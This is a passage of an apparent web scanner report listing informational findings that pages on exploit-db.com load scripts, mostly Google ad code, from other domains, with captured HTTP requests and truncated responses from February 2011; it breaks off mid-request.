<!-- SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.ypautos.com/ecl/550/scripts/s_code.js"></script>
...[SNIP]...

19.147. http://www.exploit-db.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:35:52 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:27:09 GMT
ETag: "2c28b6-101d6-49b74d6cb4540"
Accept-Ranges: bytes
Content-Length: 66006
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.148. http://www.exploit-db.com/exploits/16076/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /exploits/16076/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /exploits/16076/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.5.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:51:47 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:25:02 GMT
ETag: "2c28da-2f4f-49b74cf396780"
Accept-Ranges: bytes
Content-Length: 12111
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.149. http://www.exploit-db.com/exploits/16077/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /exploits/16077/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /exploits/16077/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.5.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:51:46 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:25:04 GMT
ETag: "36ac96-4b83-49b74cf57ec00"
Accept-Ranges: bytes
Content-Length: 19331
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
</script>
       <script type="text/javascript"
       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.150. http://www.exploit-db.com/forums/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /forums/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forums/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Referer: http://www.exploit-db.com/google-hacking-database-updates/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.15.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:18:28 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:57:24 GMT
ETag: "2c289d-20f3-49b7542f9f900"
Accept-Ranges: bytes
Content-Length: 8435
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.151. http://www.exploit-db.com/ghdb/1432/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /ghdb/1432/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ghdb/1432/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Referer: http://www.exploit-db.com/google-dorks/3/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.14.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:18:07 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 14:00:58 GMT
ETag: "4a2ba8-222b-49b754fbb5a80"
Accept-Ranges: bytes
Content-Length: 8747
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.152. http://www.exploit-db.com/ghdb/3638/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /ghdb/3638/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ghdb/3638/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.17.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:25:54 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.153. http://www.exploit-db.com/ghdb/3668/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /ghdb/3668/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ghdb/3668/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.13.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:48 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 9164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.154. http://www.exploit-db.com/ghdb/3676/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /ghdb/3676/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ghdb/3676/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.16.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:25:29 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 14:02:07 GMT
ETag: "36ac9d-223d-49b7553d835c0"
Accept-Ranges: bytes
Content-Length: 8765
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.155. http://www.exploit-db.com/google-dorks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.1.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:36:05 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 12:46:12 GMT
ETag: "2c28a3-3d38-49b7444586d00"
Accept-Ranges: bytes
Content-Length: 15672
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.156. http://www.exploit-db.com/google-dorks/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/1/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/1/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.12.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:38 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 18850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.157. http://www.exploit-db.com/google-dorks/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/3/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/3/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.11.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:33 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:24:38 GMT
ETag: "4aabe4-4ae8-49b74cdcb3180"
Accept-Ranges: bytes
Content-Length: 19176
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.158. http://www.exploit-db.com/google-dorks/4/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/4/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/4/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.10.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:31 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 19136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.159. http://www.exploit-db.com/google-dorks/5/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/5/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/5/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.9.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:30 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:49:20 GMT
ETag: "2cac8a-4aed-49b752620b800"
Accept-Ranges: bytes
Content-Length: 19181
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.160. http://www.exploit-db.com/google-dorks/6/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/6/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/6/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.7.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:18 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 14:08:57 GMT
ETag: "4b00af-49a5-49b756c485040"
Accept-Ranges: bytes
Content-Length: 18853
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.161. http://www.exploit-db.com/google-dorks/7/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-dorks/7/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-dorks/7/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.8.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:16:25 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 14:02:01 GMT
ETag: "4b023a-4af9-49b75537ca840"
Accept-Ranges: bytes
Content-Length: 19193
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.162. http://www.exploit-db.com/google-hacking-database-updates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /google-hacking-database-updates/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /google-hacking-database-updates/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.4.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:36:11 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.exploit-db.com/xmlrpc.php
Link: <http://www.exploit-db.com/?p=2659>; rel=shortlink
Content-Type: text/html; charset=UTF-8
Content-Length: 11278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.163. http://www.exploit-db.com/owned-and-exposed/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /owned-and-exposed/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /owned-and-exposed/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=171463284.1296826622.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171463284.2124507869.1296826622.1296826622.1296826622.1; __utmc=171463284; __utmb=171463284.2.10.1296826622

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 13:36:09 GMT
Server: Apache
Last-Modified: Fri, 04 Feb 2011 13:19:18 GMT
ETag: "2c28ae-2940-49b74bab86180"
Accept-Ranges: bytes
Content-Length: 10560
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

19.164. http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.exploit-db.com
Path:   /vbseo-from-xss-to-reverse-php-shell/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vbseo-from-xss-to-reverse-php-shell/ HTTP/1.1
Host: www.exploit-db.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
